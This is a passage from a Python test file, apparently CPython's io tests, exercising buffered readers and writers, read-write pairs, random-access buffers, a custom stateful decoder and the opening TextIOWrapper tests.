self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so this
# is not so easy to check there.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it would end up in gc.garbage instead.
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
class CBufferedWriterTest(BufferedWriterTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it would end up in gc.garbage instead.
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream; otherwise peek() could return fewer bytes.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs to
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
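# The integer part of the state packs both lengths as i*100 + o, which
# setstate() below unpacks again with divmod(io, 100).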
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the decoder defined above for testing purposes.
# It is disabled by default; individual tests enable it as needed.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
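# Once StatefulIncrementalDecoder.codecEnabled is set (see test_seek_and_tell),
# files can be opened with encoding='test_decoder': decoding then goes through
# the class above, while encoding falls back to latin-1 per lookupTestDecoder().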
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
